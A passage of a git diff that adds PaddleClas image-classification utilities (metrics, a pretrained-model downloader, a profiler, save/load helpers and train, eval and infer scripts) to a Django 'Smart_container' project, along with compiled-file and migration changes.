"=={}==".format(website.center(AD_LEN)), + "=" * (AD_LEN + 4), )) diff --git a/Smart_container/PaddleClas/ppcls/utils/metrics.py b/Smart_container/PaddleClas/ppcls/utils/metrics.py new file mode 100644 index 0000000..b0db68a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/metrics.py @@ -0,0 +1,107 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +from sklearn.metrics import hamming_loss +from sklearn.metrics import accuracy_score as accuracy_metric +from sklearn.metrics import multilabel_confusion_matrix +from sklearn.metrics import precision_recall_fscore_support +from sklearn.metrics import average_precision_score +from sklearn.preprocessing import binarize + +import numpy as np + +__all__ = ["multi_hot_encode", "hamming_distance", "accuracy_score", "precision_recall_fscore", "mean_average_precision"] + + +def multi_hot_encode(logits, threshold=0.5): + """ + Encode logits to multi-hot by elementwise for multilabel + """ + + return binarize(logits, threshold=threshold) + + +def hamming_distance(output, target): + """ + Soft metric based label for multilabel classification + Returns: + The smaller the return value is, the better model is. + """ + + return hamming_loss(target, output) + + +def accuracy_score(output, target, base="sample"): + """ + Hard metric for multilabel classification + Args: + output: + target: + base: ["sample", "label"], default="sample" + if "sample", return metric score based sample, + if "label", return metric score based label. + Returns: + accuracy: + """ + + assert base in ["sample", "label"], 'must be one of ["sample", "label"]' + + if base == "sample": + accuracy = accuracy_metric(target, output) + elif base == "label": + mcm = multilabel_confusion_matrix(target, output) + tns = mcm[:, 0, 0] + fns = mcm[:, 1, 0] + tps = mcm[:, 1, 1] + fps = mcm[:, 0, 1] + + accuracy = (sum(tps) + sum(tns)) / (sum(tps) + sum(tns) + sum(fns) + sum(fps)) + + return accuracy + + +def precision_recall_fscore(output, target): + """ + Metric based label for multilabel classification + Returns: + precisions: + recalls: + fscores: + """ + + precisions, recalls, fscores, _ = precision_recall_fscore_support(target, output) + + return precisions, recalls, fscores + + +def mean_average_precision(logits, target): + """ + Calculate average precision + Args: + logits: probability from network before sigmoid or softmax + target: ground truth, 0 or 1 + """ + if not (isinstance(logits, np.ndarray) and isinstance(target, np.ndarray)): + raise TypeError("logits and target should be np.ndarray.") + + aps = [] + for i in range(target.shape[1]): + ap = average_precision_score(target[:, i], logits[:, i]) + aps.append(ap) + + return np.mean(aps) diff --git a/Smart_container/PaddleClas/ppcls/utils/misc.py b/Smart_container/PaddleClas/ppcls/utils/misc.py new file mode 100644 index 0000000..90dc47e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/misc.py @@ -0,0 +1,62 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +__all__ = ['AverageMeter'] + + +class AverageMeter(object): + """ + Computes and stores the average and current value + """ + + def __init__(self, name='', fmt='f', postfix="", need_avg=True): + self.name = name + self.fmt = fmt + self.postfix = postfix + self.need_avg = need_avg + self.reset() + + def reset(self): + """ reset """ + self.val = 0 + self.avg = 0 + self.sum = 0 + self.count = 0 + + def update(self, val, n=1): + """ update """ + self.val = val + self.sum += val * n + self.count += n + self.avg = self.sum / self.count + + @property + def total(self): + return '{self.name}_sum: {self.sum:{self.fmt}}{self.postfix}'.format( + self=self) + + @property + def total_minute(self): + return '{self.name} {s:{self.fmt}}{self.postfix} min'.format( + s=self.sum / 60, self=self) + + @property + def mean(self): + return '{self.name}: {self.avg:{self.fmt}}{self.postfix}'.format( + self=self) if self.need_avg else '' + + @property + def value(self): + return '{self.name}: {self.val:{self.fmt}}{self.postfix}'.format( + self=self) diff --git a/Smart_container/PaddleClas/ppcls/utils/model_zoo.py b/Smart_container/PaddleClas/ppcls/utils/model_zoo.py new file mode 100644 index 0000000..fc527f6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/model_zoo.py @@ -0,0 +1,213 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import requests +import shutil +import tarfile +import tqdm +import zipfile + +from ppcls.arch import similar_architectures +from ppcls.utils import logger + +__all__ = ['get'] + +DOWNLOAD_RETRY_LIMIT = 3 + + +class UrlError(Exception): + """ UrlError + """ + + def __init__(self, url='', code=''): + message = "Downloading from {} failed with code {}!".format(url, code) + super(UrlError, self).__init__(message) + + +class ModelNameError(Exception): + """ ModelNameError + """ + + def __init__(self, message=''): + super(ModelNameError, self).__init__(message) + + +class RetryError(Exception): + """ RetryError + """ + + def __init__(self, url='', times=''): + message = "Download from {} failed. Retry({}) limit reached".format( + url, times) + super(RetryError, self).__init__(message) + + +def _get_url(architecture, postfix="pdparams"): + prefix = "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/" + fname = architecture + "_pretrained." + postfix + return prefix + fname + + +def _move_and_merge_tree(src, dst): + """ + Move src directory to dst, if dst is already exists, + merge src to dst + """ + if not os.path.exists(dst): + shutil.move(src, dst) + elif os.path.isfile(src): + shutil.move(src, dst) + else: + for fp in os.listdir(src): + src_fp = os.path.join(src, fp) + dst_fp = os.path.join(dst, fp) + if os.path.isdir(src_fp): + if os.path.isdir(dst_fp): + _move_and_merge_tree(src_fp, dst_fp) + else: + shutil.move(src_fp, dst_fp) + elif os.path.isfile(src_fp) and \ + not os.path.isfile(dst_fp): + shutil.move(src_fp, dst_fp) + + +def _download(url, path): + """ + Download from url, save to path. + url (str): download url + path (str): download to given path + """ + if not os.path.exists(path): + os.makedirs(path) + + fname = os.path.split(url)[-1] + fullname = os.path.join(path, fname) + retry_cnt = 0 + + while not os.path.exists(fullname): + if retry_cnt < DOWNLOAD_RETRY_LIMIT: + retry_cnt += 1 + else: + raise RetryError(url, DOWNLOAD_RETRY_LIMIT) + + logger.info("Downloading {} from {}".format(fname, url)) + + req = requests.get(url, stream=True) + if req.status_code != 200: + raise UrlError(url, req.status_code) + + # For protecting download interupted, download to + # tmp_fullname firstly, move tmp_fullname to fullname + # after download finished + tmp_fullname = fullname + "_tmp" + total_size = req.headers.get('content-length') + with open(tmp_fullname, 'wb') as f: + if total_size: + for chunk in tqdm.tqdm( + req.iter_content(chunk_size=1024), + total=(int(total_size) + 1023) // 1024, + unit='KB'): + f.write(chunk) + else: + for chunk in req.iter_content(chunk_size=1024): + if chunk: + f.write(chunk) + shutil.move(tmp_fullname, fullname) + + return fullname + + +def _decompress(fname): + """ + Decompress for zip and tar file + """ + logger.info("Decompressing {}...".format(fname)) + + # For protecting decompressing interupted, + # decompress to fpath_tmp directory firstly, if decompress + # successed, move decompress files to fpath and delete + # fpath_tmp and remove download compress file. + fpath = os.path.split(fname)[0] + fpath_tmp = os.path.join(fpath, 'tmp') + if os.path.isdir(fpath_tmp): + shutil.rmtree(fpath_tmp) + os.makedirs(fpath_tmp) + + if fname.find('tar') >= 0: + with tarfile.open(fname) as tf: + tf.extractall(path=fpath_tmp) + elif fname.find('zip') >= 0: + with zipfile.ZipFile(fname) as zf: + zf.extractall(path=fpath_tmp) + else: + raise TypeError("Unsupport compress file type {}".format(fname)) + + fs = os.listdir(fpath_tmp) + assert len( + fs + ) == 1, "There should just be 1 pretrained path in an archive file but got {}.".format( + len(fs)) + + f = fs[0] + src_dir = os.path.join(fpath_tmp, f) + dst_dir = os.path.join(fpath, f) + _move_and_merge_tree(src_dir, dst_dir) + + shutil.rmtree(fpath_tmp) + os.remove(fname) + + return f + + +def _get_pretrained(): + with open('./ppcls/utils/pretrained.list') as flist: + pretrained = [line.strip() for line in flist] + return pretrained + + +def _check_pretrained_name(architecture): + assert isinstance(architecture, str), \ + ("the type of architecture({}) should be str". format(architecture)) + pretrained = _get_pretrained() + similar_names = similar_architectures(architecture, pretrained) + model_list = ', '.join(similar_names) + err = "{} is not exist! Maybe you want: [{}]" \ + "".format(architecture, model_list) + if architecture not in similar_names: + raise ModelNameError(err) + + +def list_models(): + pretrained = _get_pretrained() + msg = "All avialable pretrained models are as follows: {}".format( + pretrained) + logger.info(msg) + return + + +def get(architecture, path, decompress=False, postfix="pdparams"): + """ + Get the pretrained model. + """ + _check_pretrained_name(architecture) + url = _get_url(architecture, postfix=postfix) + fname = _download(url, path) + if postfix == "tar" and decompress: + _decompress(fname) + logger.info("download {} finished ".format(fname)) diff --git a/Smart_container/PaddleClas/ppcls/utils/pretrained.list b/Smart_container/PaddleClas/ppcls/utils/pretrained.list new file mode 100644 index 0000000..36d70f5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/pretrained.list @@ -0,0 +1,121 @@ +ResNet18 +ResNet34 +ResNet50 +ResNet101 +ResNet152 +ResNet50_vc +ResNet18_vd +ResNet34_vd +ResNet50_vd +ResNet50_vd_v2 +ResNet101_vd +ResNet152_vd +ResNet200_vd +ResNet50_vd_ssld +ResNet50_vd_ssld_v2 +Fix_ResNet50_vd_ssld_v2 +ResNet101_vd_ssld +MobileNetV3_large_x0_35 +MobileNetV3_large_x0_5 +MobileNetV3_large_x0_75 +MobileNetV3_large_x1_0 +MobileNetV3_large_x1_25 +MobileNetV3_small_x0_35 +MobileNetV3_small_x0_5 +MobileNetV3_small_x0_75 +MobileNetV3_small_x1_0 +MobileNetV3_small_x1_25 +MobileNetV3_large_x1_0_ssld +MobileNetV3_large_x1_0_ssld_int8 +MobileNetV3_small_x1_0_ssld +MobileNetV2_x0_25 +MobileNetV2_x0_5 +MobileNetV2_x0_75 +MobileNetV2 +MobileNetV2_x1_5 +MobileNetV2_x2_0 +MobileNetV2_ssld +MobileNetV1_x0_25 +MobileNetV1_x0_5 +MobileNetV1_x0_75 +MobileNetV1 +MobileNetV1_ssld +ShuffleNetV2_x0_25 +ShuffleNetV2_x0_33 +ShuffleNetV2_x0_5 +ShuffleNetV2 +ShuffleNetV2_x1_5 +ShuffleNetV2_x2_0 +ShuffleNetV2_swish +ResNeXt50_32x4d +ResNeXt50_64x4d +ResNeXt101_32x4d +ResNeXt101_64x4d +ResNeXt152_32x4d +ResNeXt152_64x4d +ResNeXt50_vd_32x4d +ResNeXt50_vd_64x4d +ResNeXt101_vd_32x4d +ResNeXt101_vd_64x4d +ResNeXt152_vd_32x4d +ResNeXt152_vd_64x4d +SE_ResNet18_vd +SE_ResNet34_vd +SE_ResNet50_vd +SE_ResNeXt50_32x4d +SE_ResNeXt101_32x4d +SE_ResNeXt50_vd_32x4d +SENet154_vd +Res2Net50_26w_4s +Res2Net50_vd_26w_4s +Res2Net50_14w_8s +Res2Net101_vd_26w_4s +Res2Net200_vd_26w_4s +GoogLeNet +InceptionV4 +Xception41 +Xception41_deeplab +Xception65 +Xception65_deeplab +Xception71 +HRNet_W18_C +HRNet_W30_C +HRNet_W32_C +HRNet_W40_C +HRNet_W44_C +HRNet_W48_C +HRNet_W64_C +DPN68 +DPN92 +DPN98 +DPN107 +DPN131 +DenseNet121 +DenseNet161 +DenseNet169 +DenseNet201 +DenseNet264 +EfficientNetB0_small +EfficientNetB0 +EfficientNetB1 +EfficientNetB2 +EfficientNetB3 +EfficientNetB4 +EfficientNetB5 +EfficientNetB6 +EfficientNetB7 +ResNeXt101_32x8d_wsl +ResNeXt101_32x16d_wsl +ResNeXt101_32x32d_wsl +ResNeXt101_32x48d_wsl +Fix_ResNeXt101_32x48d_wsl +AlexNet +SqueezeNet1_0 +SqueezeNet1_1 +VGG11 +VGG13 +VGG16 +VGG19 +DarkNet53_ImageNet1k +ResNet50_ACNet_deploy +CSPResNet50_leaky diff --git a/Smart_container/PaddleClas/ppcls/utils/profiler.py b/Smart_container/PaddleClas/ppcls/utils/profiler.py new file mode 100644 index 0000000..7cf945a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/profiler.py @@ -0,0 +1,111 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import sys +import paddle + +# A global variable to record the number of calling times for profiler +# functions. It is used to specify the tracing range of training steps. +_profiler_step_id = 0 + +# A global variable to avoid parsing from string every time. +_profiler_options = None + + +class ProfilerOptions(object): + ''' + Use a string to initialize a ProfilerOptions. + The string should be in the format: "key1=value1;key2=value;key3=value3". + For example: + "profile_path=model.profile" + "batch_range=[50, 60]; profile_path=model.profile" + "batch_range=[50, 60]; tracer_option=OpDetail; profile_path=model.profile" + + ProfilerOptions supports following key-value pair: + batch_range - a integer list, e.g. [100, 110]. + state - a string, the optional values are 'CPU', 'GPU' or 'All'. + sorted_key - a string, the optional values are 'calls', 'total', + 'max', 'min' or 'ave. + tracer_option - a string, the optional values are 'Default', 'OpDetail', + 'AllOpDetail'. + profile_path - a string, the path to save the serialized profile data, + which can be used to generate a timeline. + exit_on_finished - a boolean. + ''' + + def __init__(self, options_str): + assert isinstance(options_str, str) + + self._options = { + 'batch_range': [10, 20], + 'state': 'All', + 'sorted_key': 'total', + 'tracer_option': 'Default', + 'profile_path': '/tmp/profile', + 'exit_on_finished': True + } + self._parse_from_string(options_str) + + def _parse_from_string(self, options_str): + for kv in options_str.replace(' ', '').split(';'): + key, value = kv.split('=') + if key == 'batch_range': + value_list = value.replace('[', '').replace(']', '').split(',') + value_list = list(map(int, value_list)) + if len(value_list) >= 2 and value_list[0] >= 0 and value_list[ + 1] > value_list[0]: + self._options[key] = value_list + elif key == 'exit_on_finished': + self._options[key] = value.lower() in ("yes", "true", "t", "1") + elif key in [ + 'state', 'sorted_key', 'tracer_option', 'profile_path' + ]: + self._options[key] = value + + def __getitem__(self, name): + if self._options.get(name, None) is None: + raise ValueError( + "ProfilerOptions does not have an option named %s." % name) + return self._options[name] + + +def add_profiler_step(options_str=None): + ''' + Enable the operator-level timing using PaddlePaddle's profiler. + The profiler uses a independent variable to count the profiler steps. + One call of this function is treated as a profiler step. + + Args: + profiler_options - a string to initialize the ProfilerOptions. + Default is None, and the profiler is disabled. + ''' + if options_str is None: + return + + global _profiler_step_id + global _profiler_options + + if _profiler_options is None: + _profiler_options = ProfilerOptions(options_str) + + if _profiler_step_id == _profiler_options['batch_range'][0]: + paddle.utils.profiler.start_profiler( + _profiler_options['state'], _profiler_options['tracer_option']) + elif _profiler_step_id == _profiler_options['batch_range'][1]: + paddle.utils.profiler.stop_profiler(_profiler_options['sorted_key'], + _profiler_options['profile_path']) + if _profiler_options['exit_on_finished']: + sys.exit(0) + + _profiler_step_id += 1 diff --git a/Smart_container/PaddleClas/ppcls/utils/save_load.py b/Smart_container/PaddleClas/ppcls/utils/save_load.py new file mode 100644 index 0000000..625a284 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/save_load.py @@ -0,0 +1,136 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import errno +import os +import re +import shutil +import tempfile + +import paddle +from ppcls.utils import logger +from .download import get_weights_path_from_url + +__all__ = ['init_model', 'save_model', 'load_dygraph_pretrain'] + + +def _mkdir_if_not_exist(path): + """ + mkdir if not exists, ignore the exception when multiprocess mkdir together + """ + if not os.path.exists(path): + try: + os.makedirs(path) + except OSError as e: + if e.errno == errno.EEXIST and os.path.isdir(path): + logger.warning( + 'be happy if some process has already created {}'.format( + path)) + else: + raise OSError('Failed to mkdir {}'.format(path)) + + +def load_dygraph_pretrain(model, path=None): + if not (os.path.isdir(path) or os.path.exists(path + '.pdparams')): + raise ValueError("Model pretrain path {} does not " + "exists.".format(path)) + param_state_dict = paddle.load(path + ".pdparams") + model.set_dict(param_state_dict) + return + + +def load_dygraph_pretrain_from_url(model, pretrained_url, use_ssld=False): + if use_ssld: + pretrained_url = pretrained_url.replace("_pretrained", + "_ssld_pretrained") + local_weight_path = get_weights_path_from_url(pretrained_url).replace( + ".pdparams", "") + load_dygraph_pretrain(model, path=local_weight_path) + return + + +def load_distillation_model(model, pretrained_model): + logger.info("In distillation mode, teacher model will be " + "loaded firstly before student model.") + + if not isinstance(pretrained_model, list): + pretrained_model = [pretrained_model] + + teacher = model.teacher if hasattr(model, + "teacher") else model._layers.teacher + student = model.student if hasattr(model, + "student") else model._layers.student + load_dygraph_pretrain(teacher, path=pretrained_model[0]) + logger.info("Finish initing teacher model from {}".format( + pretrained_model)) + # load student model + if len(pretrained_model) >= 2: + load_dygraph_pretrain(student, path=pretrained_model[1]) + logger.info("Finish initing student model from {}".format( + pretrained_model)) + + +def init_model(config, net, optimizer=None): + """ + load model from checkpoint or pretrained_model + """ + checkpoints = config.get('checkpoints') + if checkpoints and optimizer is not None: + assert os.path.exists(checkpoints + ".pdparams"), \ + "Given dir {}.pdparams not exist.".format(checkpoints) + assert os.path.exists(checkpoints + ".pdopt"), \ + "Given dir {}.pdopt not exist.".format(checkpoints) + para_dict = paddle.load(checkpoints + ".pdparams") + opti_dict = paddle.load(checkpoints + ".pdopt") + metric_dict = paddle.load(checkpoints + ".pdstates") + net.set_dict(para_dict) + optimizer.set_state_dict(opti_dict) + logger.info("Finish load checkpoints from {}".format(checkpoints)) + return metric_dict + + pretrained_model = config.get('pretrained_model') + use_distillation = config.get('use_distillation', False) + if pretrained_model: + if use_distillation: + load_distillation_model(net, pretrained_model) + else: # common load + load_dygraph_pretrain(net, path=pretrained_model) + logger.info( + logger.coloring("Finish load pretrained model from {}".format( + pretrained_model), "HEADER")) + + +def save_model(net, + optimizer, + metric_info, + model_path, + model_name="", + prefix='ppcls'): + """ + save model to the target path + """ + if paddle.distributed.get_rank() != 0: + return + model_path = os.path.join(model_path, model_name) + _mkdir_if_not_exist(model_path) + model_path = os.path.join(model_path, prefix) + + paddle.save(net.state_dict(), model_path + ".pdparams") + paddle.save(optimizer.state_dict(), model_path + ".pdopt") + paddle.save(metric_info, model_path + ".pdstates") + logger.info("Already save model in {}".format(model_path)) diff --git a/Smart_container/PaddleClas/setup.py b/Smart_container/PaddleClas/setup.py new file mode 100644 index 0000000..a17e77d --- /dev/null +++ b/Smart_container/PaddleClas/setup.py @@ -0,0 +1,58 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from io import open +from setuptools import setup + +with open('requirements.txt', encoding="utf-8-sig") as f: + requirements = f.readlines() + + +def readme(): + with open('docs/en/whl_en.md', encoding="utf-8-sig") as f: + README = f.read() + return README + + +setup( + name='paddleclas', + packages=['paddleclas'], + package_dir={'paddleclas': ''}, + include_package_data=True, + entry_points={ + "console_scripts": ["paddleclas= paddleclas.paddleclas:main"] + }, + version='0.0.0', + install_requires=requirements, + license='Apache License 2.0', + description='Awesome Image Classification toolkits based on PaddlePaddle ', + long_description=readme(), + long_description_content_type='text/markdown', + url='https://github.com/PaddlePaddle/PaddleClas', + download_url='https://github.com/PaddlePaddle/PaddleClas.git', + keywords=[ + 'A treasure chest for image classification powered by PaddlePaddle.' + ], + classifiers=[ + 'Intended Audience :: Developers', + 'Operating System :: OS Independent', + 'Natural Language :: Chinese (Simplified)', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.2', + 'Programming Language :: Python :: 3.3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5', + 'Programming Language :: Python :: 3.6', + 'Programming Language :: Python :: 3.7', 'Topic :: Utilities' + ], ) diff --git a/Smart_container/PaddleClas/tools/__init__.py b/Smart_container/PaddleClas/tools/__init__.py new file mode 100644 index 0000000..cdefb80 --- /dev/null +++ b/Smart_container/PaddleClas/tools/__init__.py @@ -0,0 +1,15 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from . import infer \ No newline at end of file diff --git a/Smart_container/PaddleClas/tools/eval.py b/Smart_container/PaddleClas/tools/eval.py new file mode 100644 index 0000000..e086da1 --- /dev/null +++ b/Smart_container/PaddleClas/tools/eval.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="eval") + engine.eval() diff --git a/Smart_container/PaddleClas/tools/eval.sh b/Smart_container/PaddleClas/tools/eval.sh new file mode 100644 index 0000000..c13ea6d --- /dev/null +++ b/Smart_container/PaddleClas/tools/eval.sh @@ -0,0 +1,7 @@ +#!/usr/bin/env bash + +# for single card eval +# python3.7 tools/eval.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml + +# for multi-cards eval +python3.7 -m paddle.distributed.launch --gpus="0,1,2,3" tools/eval.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml diff --git a/Smart_container/PaddleClas/tools/export_model.py b/Smart_container/PaddleClas/tools/export_model.py new file mode 100644 index 0000000..01aba06 --- /dev/null +++ b/Smart_container/PaddleClas/tools/export_model.py @@ -0,0 +1,34 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import paddle +import paddle.nn as nn + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="export") + engine.export() diff --git a/Smart_container/PaddleClas/tools/infer.py b/Smart_container/PaddleClas/tools/infer.py new file mode 100644 index 0000000..4f6bf92 --- /dev/null +++ b/Smart_container/PaddleClas/tools/infer.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="infer") + engine.infer() diff --git a/Smart_container/PaddleClas/tools/train.py b/Smart_container/PaddleClas/tools/train.py new file mode 100644 index 0000000..1d83590 --- /dev/null +++ b/Smart_container/PaddleClas/tools/train.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="train") + engine.train() diff --git a/Smart_container/PaddleClas/tools/train.sh b/Smart_container/PaddleClas/tools/train.sh new file mode 100644 index 0000000..083934a --- /dev/null +++ b/Smart_container/PaddleClas/tools/train.sh @@ -0,0 +1,7 @@ +#!/usr/bin/env bash + +# for single card train +# python3.7 tools/train.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml + +# for multi-cards train +python3.7 -m paddle.distributed.launch --gpus="0,1,2,3" tools/train.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml diff --git a/Smart_container/app01/.views.py.swn b/Smart_container/app01/.views.py.swn new file mode 100644 index 0000000..33f98e6 Binary files /dev/null and b/Smart_container/app01/.views.py.swn differ diff --git a/Smart_container/app01/__pycache__/__init__.cpython-36.pyc b/Smart_container/app01/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..fabf703 Binary files /dev/null and b/Smart_container/app01/__pycache__/__init__.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/admin.cpython-36.pyc b/Smart_container/app01/__pycache__/admin.cpython-36.pyc new file mode 100644 index 0000000..f48fca5 Binary files /dev/null and b/Smart_container/app01/__pycache__/admin.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/apps.cpython-36.pyc b/Smart_container/app01/__pycache__/apps.cpython-36.pyc new file mode 100644 index 0000000..62ee860 Binary files /dev/null and b/Smart_container/app01/__pycache__/apps.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/models.cpython-36.pyc b/Smart_container/app01/__pycache__/models.cpython-36.pyc new file mode 100644 index 0000000..7361063 Binary files /dev/null and b/Smart_container/app01/__pycache__/models.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/views.cpython-36.pyc b/Smart_container/app01/__pycache__/views.cpython-36.pyc new file mode 100644 index 0000000..42b5301 Binary files /dev/null and b/Smart_container/app01/__pycache__/views.cpython-36.pyc differ diff --git a/Smart_container/app01/migrations/0001_initial.py b/Smart_container/app01/migrations/0001_initial.py index 9dc3589..1a86a5e 100644 --- a/Smart_container/app01/migrations/0001_initial.py +++ b/Smart_container/app01/migrations/0001_initial.py @@ -1,4 +1,4 @@ -# Generated by Django 3.2.8 on 2021-11-02 04:32 +# Generated by Django 3.2.8 on 2022-01-26 09:35 from django.db import migrations, models diff --git a/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-38.pyc b/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-36.pyc similarity index 65% rename from Smart_container/app01/migrations/__pycache__/0001_initial.cpython-38.pyc rename to Smart_container/app01/migrations/__pycache__/0001_initial.cpython-36.pyc index 8042efd..06e76e4 100644 Binary files a/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-38.pyc and b/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-36.pyc 